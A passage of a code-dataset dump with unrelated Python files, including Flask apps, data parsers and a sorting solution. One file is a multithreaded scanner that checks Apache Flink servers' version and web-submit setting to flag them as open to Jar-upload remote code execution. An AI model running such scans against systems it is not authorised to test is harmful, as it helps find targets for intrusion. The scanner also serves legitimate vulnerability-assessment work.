restriction(self,structure):\n\tcs=structure.components\n\tif len(cs)==2:\n\t\tfor x in cs:\n\t\t\tif x:\n\t\t\t\tfor y in x:\n\t\t\t\t\tif y:\n\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\treturn False\nname='Two Components'\n","sub_path":"Restrictions/two_component_restriction.py","file_name":"two_component_restriction.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"7674239","text":"# @Author: Jenkins Alec \n# @Date: 2017-01-24T17:52:32-08:00\n# @Project: LTSPM analysis\n# @Last modified by: alec\n# @Last modified time: 2017-04-10T09:48:40-07:00\n\n\nimport numpy as np\nimport json\n\nfilespec = 'Msfixed'\nsavepath = '/Users/alec/UCSB/cofeb_analysis_data/ta/cal_parameters_'+filespec+'.json'\n\n# in Si units\nMst = (6.54577e-4)\nMstError = 1.01402555e-5\nt = 1.0e-9\nMs = Mst/t\nKeff = 8.20955e3\nDW_width = 36.991e-9\nAex = 1.1233e-11\n\n# radians and m\nheight = 63.4248e-9 # calibrated height using +/- 3 points from cal peak and fitted finite edge width\nheightError = 4.861e-9\ntheta = 1.033522705227361 # extracted from Bz0 and NV splitting away from edge\nthetaError = 0.1089657# std of Bz0 and NV splitting away from edge\nphi = 0\n\n# m\nscanSize = 0.6*(5e-6)\n\ncalparams = {'Ms':Ms, 't':t, 'MstError':MstError, 'theta':theta,\n 'thetaError':thetaError, 'phi':phi, 'height':height, 'heightError':heightError, 'Keff':Keff,\n 'Aex':Aex, 'DW_width':DW_width, 'scanSize':scanSize}\n\nwith open(savepath, 'w') as fwrite:\n json.dump(calparams, fwrite)\n","sub_path":"cofeb_analysis/ta/1760/set_cal_params.py","file_name":"set_cal_params.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"282374445","text":"# Team Mongo-Lians\n# Joan Chirinos, Aaron Li, Joyce Liao\n\nimport os\n\nfrom flask import Flask, render_template, redirect, url_for, session, request, flash, get_flashed_messages\nimport pprint\n\nfrom util import pokemon as pk\nfrom util import history as hist\nfrom util import mongo \n\napp = Flask(__name__)\napp.secret_key = os.urandom(32)\n\n@app.route('/')\ndef landing():\n return render_template('landing.html')\n\n@app.route('/pokemon')\ndef pokemonLanding():\n return render_template('pokemonLanding.html')\n\n@app.route('/history')\ndef historyLanding():\n return render_template('historyLanding.html')\n\n@app.route('/nobel')\ndef nobelLanding():\n return render_template(\"nobel.html\")\n\n@app.route('/getPokemen', methods=[\"POST\"])\ndef getMen():\n\n # connect to DB\n client = pk.connect('69.55.59.139')\n db = pk.getDatabase(client, 'test')\n collection = pk.getCollection(db, 'pokemon')\n\n types = request.form.getlist('type')\n id = request.form.get('id')\n weaknesses = request.form.getlist('weak')\n all = request.form.get('all')\n\n query = {}\n if all:\n qtypes = [{'type': i} for i in types]\n qweaknesses = [{'weaknesses': i} for i in weaknesses]\n query = {'$and': qtypes + qweaknesses}\n if id.strip() != '':\n query['id'] = int(id)\n fields = {'_id': 0, 'name': 1, 'weaknesses': 1, 'type': 1, 'img': 1, 'id': 1}\n print('QUERY:')\n pprint.pprint(query)\n print('FIELDS')\n pprint.pprint(fields)\n pokemon = pk.findDocuments(collection, query, fields)\n hasmon = False\n print('OUT')\n pokelist = []\n for i in pokemon:\n pokelist.append(i)\n hasmon = True\n print(pokelist)\n return render_template('pokemonGet.html', hasmon=hasmon, pokemon=pokelist, types=', '.join(types), weaknessess=', '.join(weaknesses), id=id)\n else:\n qtypes = [{'type': i} for i in types]\n qweaknesses = [{'weaknesses': i} for i in weaknesses]\n if qtypes == []:\n qtypes = [{}]\n if qweaknesses == []:\n qweaknesses = [{}]\n query = {'$and': [{'$or': qtypes}, {'$or': qweaknesses}]}\n if id.strip() != '':\n query['id'] = int(id)\n fields = {'_id': 0, 'name': 1, 'weaknesses': 1, 'type': 1, 'img': 1, 'id': 1}\n print('QUERY:')\n pprint.pprint(query)\n print('FIELDS')\n pprint.pprint(fields)\n pokemon = pk.findDocuments(collection, query, fields)\n print('OUT')\n pokelist = []\n hasmon = False\n for i in pokemon:\n pokelist.append(i)\n hasmon = True\n print(pokelist)\n return render_template('pokemonGet.html', hasmon=hasmon, pokemon=pokelist, types=', '.join(types), weaknesses=', '.join(weaknesses), id=id)\n\n@app.route('/hist', methods=[\"POST\"])\ndef retHist():\n # connect\n SERVER_ADDR = \"69.55.59.139\" # Aaron\n client = hist.connect(SERVER_ADDR)\n db = client.history\n col = db.files\n hist.imp(db, col)\n\n date = request.form.get(\"date\")\n phrase = request.form.get(\"phrase\")\n print(\"\\n\\n\", date, phrase, \"\\n\\n\")\n if not date and phrase != \"\":\n data = hist.find(str(phrase), col)\n if data != -1:\n return render_template(\"history.html\", phrases = data, descs = -1)\n elif date != \"\" and not phrase:\n data = hist.yearDesc(str(date), col)\n if data[0] != -1:\n return render_template(\"history.html\", phrases = -1, descs = data[1:])\n else:\n if type(date) == type(\"\") and type(phrase) == type(\"\"):\n phrases = hist.find(str(phrase), col)\n dates = hist.yearDesc(str(date), col)\n if phrases != -1 and dates[0] != -1:\n print(\"\\n\\n\", phrases, \"\\ndates\\n\", dates, \"\\n\\n\")\n return render_template(\"history.html\", phrases = phrases, descs = dates[1:])\n\n# def getData():\n# type = request.args[\"type\"]\n# data = mongo.getData(request.args[\"arg\"], type)\n# return render_template(\"result.html\", data=data)\n\n# @app.route(\"/launch\")\n# def launch():\n# addr = request.args[\"ip\"]\n# mongo.launchDB(addr)\n# return redirect(url_for(\"nobelLanding\"))\n\nif __name__ == '__main__':\n app.debug = True\n app.run()\n","sub_path":"08_mongosite/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"640259272","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nimport argparse\nimport sys\nimport pandas as pd\nimport subprocess\nimport pdb\n\n#Arguments for argparse module:\nparser = argparse.ArgumentParser(description = '''A program that parses TMalign output.''')\n \nparser.add_argument('id_file', nargs=1, type= str,\n default=sys.stdin, help = 'path to pdb ids file. Structure: #uid\tpdb_id.')\n\nparser.add_argument('align_file', nargs=1, type= str,\n default=sys.stdin, help = 'path to file with TMalign output.')\n\n#Functions\ndef get_pairwise_dist(file_path, df):\n\t'''A function that gets the uids and the corresponding scores\n\tand returns them as lists.\n\t'''\n\n\tuid_pairs = [] #List with unique ids\n\n\t#df.loc[df['pdb'] == '1zmq']\n\tprint('uid1' + '\\t' + 'uid2' + '\\t' + 'RMSD')\n\twith open(file_path) as file:\n\t\tfor line in file:\n\t\t\tif 'Name of Chain' in line:\n\t\t\t\tline = line.rstrip() #remove \\n\n\t\t\t\tline = line.split(\"/\") #split on /\n\t\t\t\tpdb_id = line[-1].split(\".\")[0] #Get pdb id\n\t\t\t\tuid =df.loc[df['pdb'] == pdb_id]['#uid'].values[0] #Get corresponding uid\n\t\t\t\t\n\t\t\t\tuid = str(uid).zfill(9)\n\t\t\t\tuid_pairs.append(uid)\n\n\t\t\tif 'RMSD' in line:\n\t\t\t\tline = line.rstrip() #remove \\n\n\t\t\t\tline = line.split(\",\") #split on ,\n\t\t\t\tRMSD = line[1].split(' ')[-1] #Split on space\n\n\t\t\t\tprint(uid_pairs[0] + '\\t' + uid_pairs[1] + '\\t' + str(RMSD))\n\t\t\t\tuid_pairs = [] #reset list of pairs\n\n\n\n\treturn None\n\n\n#Main program\nargs = parser.parse_args()\n\nid_file = args.id_file[0]\nalign_file = args.align_file[0]\n\n#Read tsv file as pandas dataframe\ndf = pd.read_csv(id_file, sep='\\t')#get_ids\n\npdb_ids = df['pdb']\nuids = df['#uid']\n\n#Get pairwise RMSD and print in tsv\nget_pairwise_dist(align_file, df)\n","sub_path":"ECOD/parse_rmsd.py","file_name":"parse_rmsd.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"581011845","text":"# -*- coding: utf-8 -*-\n# adminPages.py\n\nfrom flask import Blueprint,Flask, jsonify, render_template, request,make_response,redirect\nimport json\nimport config\nimport model\nimport formr\nimport time\n\n\nimport adminModel\n\nadmin = Blueprint('admin', __name__)\ndef connectdb():\n db = config._db_Conn_()\n conn = db._db_()\n cur = conn.cursor()\n return (db,cur)\n\ndef closedb(db,cur):\n db.close()\n cur.close()\n\n@admin.route('/login',methods = ['GET', 'POST'] )\ndef login():\n form = formr.login()\n if form.validate_on_submit():#判断表单是否都填写了\n print(form.dlzh.data)\n return render_template(\"ryxz.html\",form=form)\n\n\n@admin.route('/zcgz')\ndef zcgz():\n app=\"BSDW2017082300001\"\n time2=time.strftime(\"%Y-%M-%d %H:%M:%S\")\n tbr=\"admin\"\n return render_template(\"zcgz.html\",app=app,time2=time2,tbr=tbr)\n\n@admin.route('/wztj')\ndef wztj():\n return render_template(\"wztj.html\")\n\n#组织管理\n@admin.route('/zzgl')\ndef zzgl():\n return render_template(\"zzgl.html\")\n\n@admin.route('/xlgl')\ndef xlgl():\n return render_template(\"xlsjgl.html\")\n\n@admin.route('/xlgl2',methods = ['GET', 'POST'])\ndef xlgl2():\n rows = request.args.get('rows', 0, type=int)\n page = request.args.get('page', 0, type=int)\n flbs = request.args.get('flbs', 0, type=str)\n flmc = request.args.get('flmc', 0, type=str)\n ac=adminModel.dmflq()\n _re_json_=ac.query(flbs,flmc,rows,page)\n return json.dumps(_re_json_)\n\n@admin.route('/xlgl3',methods = ['GET', 'POST'])\ndef xlgl3():\n rows = request.args.get('rows', 0, type=int)\n page = request.args.get('page', 0, type=int)\n flbs = request.args.get('flbs', 0, type=str)\n ac=adminModel.dmxlq()\n _re_json_=ac.query(flbs,rows,page)\n return json.dumps(_re_json_)\n\n@admin.route('/delxl',methods = ['GET', 'POST'])\ndef delxl():\n flbs = request.form.get(\"flbs\")\n ac=adminModel.dmflq()\n _re_json_=ac.delxl(flbs)\n return json.dumps(\"su\")\n\n@admin.route('/delxlbm',methods = ['GET', 'POST'])\ndef delxlbm():\n dmbm = request.form.get(\"dmbm\")\n print(dmbm)\n ac=adminModel.dmxlq()\n _re_json_=ac.delxlbm2(dmbm)\n return json.dumps(\"su\")\n\n\n@admin.route('/addxldm',methods = ['GET', 'POST'] )\ndef addxldm():\n form = formr.addxldm()\n return render_template(\"addxlbm.html\",form=form)\n\n\n@admin.route('/zzcx',methods = ['GET', 'POST'] )\ndef zzcx():\n rows = request.args.get('rows', 0, type=int)\n page = request.args.get('page', 0, type=int)\n zzbm = request.args.get('dlzh', 0, type=str)\n zzmc = request.args.get('rymc', 0, type=str)\n sjzzbm =request.args.get('sjzzbm', 0, type=str)\n print(rows)\n print(page)\n ac = model.busi()\n _re_json_ = ac.query(zzbm,zzmc,sjzzbm,rows,page)\n return json.dumps(_re_json_)\n\n@admin.route('/zzxz',methods = ['GET', 'POST'] )\ndef zzxz():\n form = formr.busi()\n return render_template(\"zzxz.html\",form=form)\n\n@admin.route('/zzxz2',methods=['POST'])\ndef zzxz2():\n data=request.form\n form = formr.MyForm()\n print(data)\n busi=model.busi()\n busi.addBusi(data)\n return \"success\"\n\n@admin.route('/zzsc',methods = ['GET', 'POST'])\ndef zzsc():\n print(\"in\")\n data=request.form\n print(data)\n busi=model.busi()\n busi.delBusi(data[\"zzbm\"])\n return \"success\"\n\n@admin.route('/ryxz/',methods = ['GET', 'POST'] )\ndef ryxz():\n form = formr.MyForm()\n print(form.dlzh)\n return render_template(\"ryxz.html\",form=form)\n\n@admin.route('/rofl/',methods = ['GET', 'POST'] )\ndef rofl():\n rybs = request.args.get('rybs', 0, type=str)\n print(rybs)\n return render_template(\"rofl.html\",rybs=rybs)\n\n@admin.route('/srofl',methods = ['GET', 'POST'] )\ndef srofl():\n form = request.form.getlist(\"js\")\n rybs=request.form.get(\"rybs\")\n rs=model.rofl()\n rs.save(form,rybs)\n return \"123\"\n\n@admin.route('/trofl',methods = ['GET', 'POST'] )\ndef trofl():\n tr=[{ \"id\":1, \"pId\":0, \"name\":\"业务角色\", \"open\":\"true\"},\n { \"id\":11, \"pId\":1, \"name\":\"业扩专责\", \"open\":\"true\",\"checked\":\"true\"},\n { \"id\":12, \"pId\":1, \"name\":\"计量专责\", \"open\":\"true\"},\n { \"id\":13, \"pId\":1, \"name\":\"营销专责\", \"open\":\"true\"},\n { \"id\":2, \"pId\":0, \"name\":\"系统角色\", \"open\":\"false\"},\n { \"id\":21, \"pId\":2, \"name\":\"管理员\", \"open\":\"true\"},\n { \"id\":22, \"pId\":2, \"name\":\"操作员\", \"open\":\"true\",\"checked\":\"true\"}]\n return json.dumps(tr)\n\n@admin.route('/sumit/',methods = ['GET', 'POST'] )\ndef sumit():\n form = formr.MyForm()\n if form.validate_on_submit():#判断表单是否都填写了\n print(form.dlzh.data)\n return render_template(\"ryxz.html\",form=form)\n\n@admin.route('/rycx',methods = ['GET', 'POST'] )\ndef rycx():\n rows = request.args.get('rows', 0, type=int)\n page = request.args.get('page', 0, type=int)\n dlzh = request.args.get('dlzh', 0, type=str)\n rymc = request.args.get('rymc', 0, type=str)\n zzbm = request.args.get('zzbm', 0, type=str)\n ac = model.user()\n _re_json_ = ac.query2(dlzh,rymc,zzbm)\n return json.dumps(_re_json_)\n\n@admin.route('/ryxz2',methods=['POST'])\ndef ryxz2():\n data=request.form\n form = formr.MyForm()\n if form.validate_on_submit():\n user=model.user()\n user.addUser(data)\n return \"success\"\n else:\n return \"erro\"\n #return \"success\"\n\n\n@admin.route('/addxl',methods=['POST'])\ndef addxl():\n data=request.form\n user=adminModel.dmxlq()\n user.addxl(data)\n return \"success\"\n\n #return \"success\"\n\n@admin.route('/rysc',methods = ['GET', 'POST'])\ndef rysc():\n print(\"in\")\n data=request.form\n user=model.user()\n user.delUser(data[\"rybs\"])\n return \"success\"\n\n@admin.route('/getxl',methods = ['GET', 'POST'])\ndef getxl():\n ac=adminModel.dmxlq()\n _re_json_=ac.query2()\n print(_re_json_)\n print(\"---------------11\")\n return json.dumps(_re_json_)\n\n@admin.route('/getxl2',methods = ['GET', 'POST'])\ndef getxl2():\n ac=adminModel.dmxlq()\n _re_json_=ac.query3()\n print(\"---------------11\")\n return _re_json_","sub_path":"adminPages.py","file_name":"adminPages.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"300722774","text":"class Solution(object):\n def sortColors(self, nums):\n def sortNumber(left, right, number):\n while left <= right:\n while left <= right and nums[left] != number:\n left += 1\n while left <= right and nums[right] == number:\n right -= 1\n if left <= right:\n nums[left], nums[right] = nums[right], nums[left]\n left += 1\n right -= 1\n return right\n if len(nums) <= 1:\n return nums\n left, right = 0, len(nums) - 1\n left, right = 0, sortNumber(left, right, 2)\n sortNumber(left, right, 1)\n return nums\n\n\n'''\nhttps://leetcode-cn.com/problems/sort-colors/\n一开始的想法,找某个数字的位置放在它该在的位置\n\n但是其实这个就是快排的思想的partition过程:\n给一个数,前面都是比它大的,后面都是比它小的\n与快排的区别,因为知道只有三个数, 所以有三个index, 分别对应于只有0的区, 只有1的区和只有2的区\n[0:zero] 只有0\n(zero, i)只有1\n[two:] 只有2\n\n总之,涉及到分区: 快排思想\n'''\nclass Solution(object):\n def sortColors(self, nums):\n if len(nums) <= 1:\n return nums\n zero = -1\n i = 0\n two = len(nums) - 1\n while i <= two:\n if nums[i] == 0:\n zero += 1\n nums[i], nums[zero] = nums[zero], nums[i]\n i += 1\n elif nums[i] == 1:\n i += 1\n elif nums[i] == 2:\n nums[i], nums[two] = nums[two], nums[i]\n #这个时候不知道i是不是1,所以不能 i++\n two -= 1\n return nums\n\n\n\n'''\ntest case:\n1.\n[2,1]\n'''\nif __name__ == \"__main__\":\n a = Solution()\n nums = [1,2,1]\n print(a.sortColors(nums))\n\n","sub_path":"All_about_sorted/quickSort/Leetcode_75/lc75.py","file_name":"lc75.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"24719510","text":"import os\nimport time\nimport logging\n\nfrom flask import Flask, request, make_response\nfrom cloudevents.http import CloudEvent, to_structured, from_http\n\nimport requests\n\nimport uuid\nimport cv2\nimport json\nimport base64\nimport numpy as np\n\n# Predict using Tensorflow\nfrom tensorflowyolo import TensorflowYolo\n\n\nmy_tf = None\nce_action_type = None\nce_action_source = None\nkn_broker_url = None\n\ndef convert_b64jpeg_to_image(b64jpeg):\n\n # Decode base64 string in bytes\n img_bytes = base64.b64decode(b64jpeg)\n \n # Convert in np array \n jpg_as_np = np.frombuffer(img_bytes, dtype=np.uint8)\n\n # Decode into cv2 image\n return cv2.imdecode(jpg_as_np, flags=1) \n\ndef convert_image_to_jpeg(image):\n # Encode frame as jpeg\n frame = cv2.imencode('.jpg', image)[1].tobytes()\n\n # Encode frame in base64 representation and remove utf-8 encoding\n frame = base64.b64encode(frame).decode('utf-8')\n return \"data:image/jpeg;base64,{}\".format(frame)\n\napp = Flask(__name__)\n\n@app.route('/', methods=['POST'])\ndef process_image():\n # app.logger.debug(request.headers)\n\n # create a CloudEvent\n event = from_http(request.headers, request.get_data())\n\n # you can access cloudevent fields as seen below\n app.logger.info(\n f\"Found {event['id']} from {event['source']} with type \"\n f\"{event['type']} and specversion {event['specversion']}\"\n )\n # app.logger.info(event)\n\n data = event.data\n\n if 'image' in data and 'time' in data:\n\n frame = convert_b64jpeg_to_image(data['image'].split(',')[1])\n\n app.logger.info(data['time'] + \" \" + str(frame.shape))\n\n\n # check / set cam ID\n cam_id = 0\n if 'id' in data:\n cam_id = data['id']\n\n\n # Call TF Yolo for object (damage) detection\n\n start = time.time()\n detected_classes, image_pred = my_tf.predict(frame)\n end = time.time()\n app.logger.info('Predict: Total object detection took {:.5f} seconds'.format(end - start))\n\n if detected_classes:\n\n app.logger.info(detected_classes)\n status = 1\n\n # Create a CloudEvent\n # - The CloudEvent \"id\" is generated if omitted. \"specversion\" defaults to \"1.0\".\n try:\n attributes = {\n 'type': ce_action_type,\n 'source': ce_action_source,\n }\n event_data = {\n 'uuid': str(uuid.uuid4()), # TO-DO: Please with event uuid\n 'failure': detected_classes,\n 'status': status,\n 'time': data['time']\n }\n event = CloudEvent(attributes, event_data)\n\n # Creates the HTTP request representation of the CloudEvent in structured content mode\n headers, body = to_structured(event)\n\n # POST\n requests.post(kn_broker_url, data=body, headers=headers)\n\n except:\n app.logger.error(f'Failed to send CloudEvent to: {kn_broker_url}')\n\n else:\n status = 0\n\n text = data['time']\n\n # Respond with another event (optional)\n response = make_response({\n 'text': text,\n 'id': cam_id,\n 'status': status,\n 'image': convert_image_to_jpeg(image_pred),\n })\n response.headers[\"Ce-Id\"] = str(uuid.uuid4())\n response.headers[\"Ce-specversion\"] = \"1.0\"\n response.headers[\"Ce-Source\"] = \"manuela/eventing/image-processor\"\n response.headers[\"Ce-Type\"] = \"manuela.image-processor.response\"\n else:\n app.logger.warning(\"Payload not valid.\")\n response = make_response({\n 'msg': 'Payload not valid'\n })\n return response\n\n\nif __name__ == '__main__':\n\n app.logger.setLevel(logging.DEBUG)\n app.logger.info(\"Configure TF based Yolo neural network ...\")\n tfmodel_path = os.getenv(\"TF_MODEL_PATH\", default=\"./tf-model\")\n\n ce_action_type = os.getenv(\"CE_ACTION_TYPE\", default=\"manuela.image-processor.action\")\n ce_action_source = os.getenv(\"CE_ACTION_SOURCE\", default=\"manuela/eventing/image-processor\")\n kn_broker_url = os.getenv(\"KN_BROKER_URL\", default=\"http://broker-ingress.knative-eventing.svc.cluster.local/sbergste-knative/default\")\n\n my_tf = TensorflowYolo(tfmodel_path=tfmodel_path)\n\n app.run(debug=False, host='0.0.0.0', port=8080)","sub_path":"image-processor/image-processor.py","file_name":"image-processor.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"102208614","text":"#!/usr/bin/env python3\n\nfrom sys import argv\nfrom models import *\nfrom os import listdir\nfrom os.path import isfile, join\n\ndef help():\n print(\"Adds a task, a version or a constraint to the database.\")\n print(\"subcommands:\")\n print(\"\\ttask ...\\t\\t\\tadds tasks\")\n print(\"\\ttask_dir \\t\\t add all files in as task\")\n print(\"\\tversion ...\\t\\tadds version\")\n print(\"\\tconstraint \\tadds constraint\")\n print(\"\\twork all for all lvls\")\n print(\"\\twork imperfect for all imperfect lvls\")\n\ndef add_task(paths):\n connect()\n for p in paths:\n Task.create(path=p)\n close()\n\ndef add_task_dir(paths):\n connect()\n for p in paths:\n tasks = set([t.path for t in Task.select()])\n print(\"Found\", len(tasks), \"task files.\")\n\n files = [str(f) for f in listdir(p) if isfile(join(p, f)) and f not in tasks]\n print(\"Found\", len(files), \" tasks in DB\")\n files_dict = [{\"path\": f} for f in files]\n\n with database.atomic():\n for idx in range(0, len(files_dict), 100):\n Task.insert_many(files_dict[idx:idx+100]).execute()\n close()\n\ndef add_version(paths):\n connect()\n for p in paths:\n Version.create(reference=p)\n close()\n\ndef add_constraint(name, runtime_ms, cores):\n connect()\n Constraint.create(runtime_ms=runtime_ms, cores=cores, name=name)\n close()\n\ndef add_work(args):\n if args[0] == \"imperfect\":\n help() if len(args) < 5 else add_work_imperfect(args[1], args[2], args[3], args[4])\n elif args[0] == \"all\":\n help() if len(args) < 5 else add_work_all(args[1], args[2], args[3], args[4])\n else:\n help()\n\ndef add_work_imperfect(reference, constraint, count, priority):\n print(\"JOIN DOES NOT WORK YET :(\")\n connect()\n version=Version.get(reference=reference)\n constraint=Constraint.get(name=constraint)\n #we use list() to make faster?\n tasks = Task.select().where(Run.score != 1.0 or Run << None).group_by(Task).join(Run)\n print(\"tasks.count\", tasks.count())\n return\n Work.enque(tasks, version, constraint, priority, count)\n close()\n\ndef add_work_all(reference, constraint, count, priority):\n connect()\n version=Version.get(reference=reference)\n constraint=Constraint.get(name=constraint)\n tasks = Task.select()\n print(\"tasks.count\", tasks.count())\n Work.enque(tasks, version, constraint, priority, count)\n #we use list() to make faster?\n #for task in list(Task.select()):\n #Work.enque(task, version=version, constraint=constraint, priority=priority, count=count)\n close()\n\ndef add(args):\n if args[0] == \"task\":\n add_task(args[1:])\n elif args[0] == \"task_dir\":\n add_task_dir(args[1:])\n elif args[0] == \"version\":\n add_version(args[1:])\n elif args[0] == \"constraint\":\n help() if len(args) < 4 else add_constraint(args[1], args[2], args[3])\n elif args[0] == \"work\":\n add_work(args[1:])\n else:\n help()\n\ndef main():\n if len(argv) < 3:\n help()\n return\n add(argv[1:])\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"meta/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"406746851","text":"import requests\r\nimport re\r\nimport sys\r\nimport urllib3\r\nfrom argparse import ArgumentParser\r\nimport threadpool\r\nfrom urllib import parse\r\nfrom time import time\r\nimport random\r\n\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\nfilename = sys.argv[1]\r\nurl_list=[]\r\n\r\n#随机ua\r\ndef get_ua():\r\n\tfirst_num = random.randint(55, 62)\r\n\tthird_num = random.randint(0, 3200)\r\n\tfourth_num = random.randint(0, 140)\r\n\tos_type = [\r\n\t\t'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',\r\n\t\t'(Macintosh; Intel Mac OS X 10_12_6)'\r\n\t]\r\n\tchrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)\r\n\r\n\tua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',\r\n\t\t\t\t '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']\r\n\t\t\t\t )\r\n\treturn ua\r\n\r\n#获取版本信息\r\ndef check_vuln(url):\r\n\turl = parse.urlparse(url)\r\n\turl1 = url.scheme + '://' + url.netloc\r\n\turl2 = url.scheme + '://' + url.netloc + '/config'\r\n\theaders = {'User-Agent': get_ua()}\r\n\ttry:\r\n\t\tres = requests.get(url2,timeout=15,verify=False)\r\n\t\tversion = re.findall(r'\"flink-version\":\"(.*?)\",\"', res.text)[0]\r\n\t\t# print (\"[+]\" + url1 + ' ' + version)\r\n\t\tlist1 = version.split('.') #version格式为1.x.1 用split切割成数组\r\n\t\tif int(list1[1]) <= 10:#取中间为与10比较 小于等于10为true\r\n\t\t\ttry:\r\n\t\t\t\tres3 = requests.get(url2,timeout=15,verify=False)\r\n\t\t\t\tif re.search(r'web-submit',res3.text,re.I):\r\n\t\t\t\t\tpoc = re.findall(r'\"web-submit\":(.*?)}', res3.text)[0]\r\n\t\t\t\t\tif poc == \"false\":\r\n\t\t\t\t\t\tprint (\"[-]%s version:%s Target is Not vuln\" %(url1,version))\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tprint (\"\\033[32m[+]%s version:%s Target is vuln!\\033[0m\" %(url1,version))\r\n\t\t\t\telse:\r\n\t\t\t\t\tprint (\"\\033[32m[+]%s version:%s Target is vuln!\\033[0m\" %(url1,version))\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tprint (\"[-]%s version:%s Target is Not vuln\" %(url1,version))\r\n\t\t# t.write(\"%s %s\\n\" %(url,flag))\r\n\texcept Exception as e:\r\n\t\tprint(\"[-]%s is timeout\" %url1)\r\n\r\n\r\n#多线程\r\ndef multithreading(url_list, pools=5):\r\n\tworks = []\r\n\tfor i in url_list:\r\n\t\t# works.append((func_params, None))\r\n\t\tworks.append(i)\r\n\t# print(works)\r\n\tpool = threadpool.ThreadPool(pools)\r\n\treqs = threadpool.makeRequests(check_vuln, works)\r\n\t[pool.putRequest(req) for req in reqs]\r\n\tpool.wait()\r\n\r\n\r\nif __name__ == '__main__':\r\n\tshow = r'''\r\n\t ___ _ ______ _ _ _ \r\n\t / _ \\ | | | ___| (_) | | \r\n\t / /_\\ \\_ __ __ _ ___| |__ ___| |_ | |_ _ __ | | __ _ __ ___ ___ \r\n\t | _ | '_ \\ / _` |/ __| '_ \\ / _ \\ _| | | | '_ \\| |/ / | '_ \\ / _ \\ / __|\r\n\t | | | | |_) | (_| | (__| | | | __/ | | | | | | | < | |_) | (_) | (__ \r\n\t \\_| |_/ .__/ \\__,_|\\___|_| |_|\\___\\_| |_|_|_| |_|_|\\_\\ | .__/ \\___/ \\___|\r\n\t | | ______| | \r\n\t |_| |______|_| \r\n\t \r\n\t \r\n ApacheFlink_Jar_upload_RCE_poc By m2\r\n\t'''\r\n\tprint(show + '\\n')\r\n\targ=ArgumentParser(description='ApacheFlink_Jar_upload_RCE_poc By m2')\r\n\targ.add_argument(\"-u\",\r\n\t\t\t\t\t\t\"--url\",\r\n\t\t\t\t\t\thelp=\"Target URL; Example:http://ip:port\")\r\n\targ.add_argument(\"-f\",\r\n\t\t\t\t\t\t\"--file\",\r\n\t\t\t\t\t\thelp=\"Target URL; Example:url.txt\")\r\n\targs=arg.parse_args()\r\n\turl=args.url\r\n\tfilename=args.file\r\n\tstart=time()\r\n\tif url != None and filename == None:\r\n\t\tcheck_vuln(url)\r\n\telif url == None and filename != None:\r\n\t\tfor i in open(filename):\r\n\t\t\ti=i.replace('\\n','')\r\n\t\t\turl_list.append(i)\r\n\t\tmultithreading(url_list,10)\r\n\tend=time()\r\n\tprint('任务完成,用时%d' %(end-start))","sub_path":"ApacheFlink_poc.py","file_name":"ApacheFlink_poc.py","file_ext":"py","file_size_in_byte":3799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"339781111","text":"import os\nfrom configobj import ConfigObj\nfrom validate import Validator\nfrom typing import Any\n\nfrom resistics.common.print import generalPrint, errorPrint\nfrom resistics.common.io import checkFilepath\n\n\ndef getDefaultConfigFilepath() -> str:\n \"\"\"Get the default global configuration option\n\n Returns\n -------\n str\n Path to global config file\n \"\"\"\n # use relative path from here\n path = os.path.split(__file__)[0]\n globalConfigFile = os.path.join(path, \"..\", \"resisticsConfig.ini\")\n if not checkFilepath(globalConfigFile):\n errorPrint(\n \"getDefaultConfig\",\n \"Default configuration file could not be found\",\n quitrun=True,\n )\n return globalConfigFile\n\n\ndef loadConfig(filepath: str = \"\") -> ConfigObj:\n \"\"\"Get configuration information\n\n Parameters\n ----------\n filepath : str, optional\n The path to the configuration file\n\n Returns\n -------\n config : ConfigObj\n ConfigObj with global configuration parameters\n \"\"\"\n configFile = getDefaultConfigFilepath()\n if filepath == \"\" or not checkFilepath(filepath):\n config = ConfigObj(configspec=configFile)\n else:\n config = ConfigObj(filepath, configspec=configFile)\n generalPrint(\"loadConfig\", \"Loading configuration file {:s}\".format(filepath))\n validator = Validator()\n result = config.validate(validator)\n if not result:\n errorPrint(\"loadConfigFile\", \"Config file validation failed\", quitrun=True)\n return config\n","sub_path":"resistics/config/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"204605744","text":"# : Harvey Chang\n# : chnme40cs@gmail.com\n# this file is used to pre_train the parameters for WRNN:\nimport numpy as np\nimport tensorflow as tf\nfrom plant import prepare_pre_train_data\nfrom matplotlib import pyplot as plt\nfrom wavelet import wavelet\n\n\ndef predict_model(layer):\n\n hidden_dim = [128]\n pre_dim = [1]\n with tf.variable_scope('rnn/wrnn'):\n for dim, p_dim in zip(hidden_dim, 